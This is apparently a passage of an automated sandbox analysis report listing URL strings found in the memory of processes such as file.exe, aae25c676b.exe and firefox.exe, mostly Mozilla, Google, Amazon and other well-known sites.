Source: firefox.exe, 0000001A.00000002.2913537647.000002EE60061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationMaster
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/.
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C918000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/m
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001A.00000002.2905856189.000002EE5EF42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C9B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: file.exe, 00000000.00000003.2215691482.00000000055D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2215691482.00000000055D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64BC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C96B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2947092222.000028CD8F900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D88E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58ED5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58E68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001A.00000002.2929744715.000002EE64DB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2779151506.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2778146878.000002EE5DBBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DBA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2780374818.000002EE5DB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2791936031.000002EE5DC43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D8A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 0000001A.00000002.2911859884.000002EE5FF8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2942500149.0000172EA5204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/Z
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
